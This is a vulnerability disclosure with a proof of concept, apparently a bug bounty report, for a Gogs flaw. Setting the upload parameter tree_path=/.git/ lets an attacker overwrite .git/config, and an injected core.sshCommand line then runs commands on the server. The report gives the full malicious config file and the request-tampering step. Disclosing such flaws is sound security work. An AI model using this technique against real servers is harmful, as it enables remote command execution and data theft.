Description

When uploading a file to the repository in Gogs, the tree_path parameter is not been validated. The attacker can set tree_path=/.git/ to upload file into the .git directory.

Rewrite .git/config file and set core.sshCommand, which leads to remote command execution vulnerability.

Proof of Concept

Create a repository in Gogs, upload a file config to the repository on the web page:

[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
	ignorecase = true
	precomposeunicode = true
	sshCommand = echo pwnned > /tmp/poc
[remote "origin"]
	url = [email protected]:torvalds/linux.git
	fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
	remote = origin
	merge = refs/heads/master

Intercept the HTTP POST form submitting request, and set parameter to tree_path=/.git/ in request body.

Then a file with text pwnned is created in /tmp/poc.

Impact

This vulnerability is capable of executing commands on the remote server and gain the privileged user account, which leads sensitive data exposure, identity theft, etc.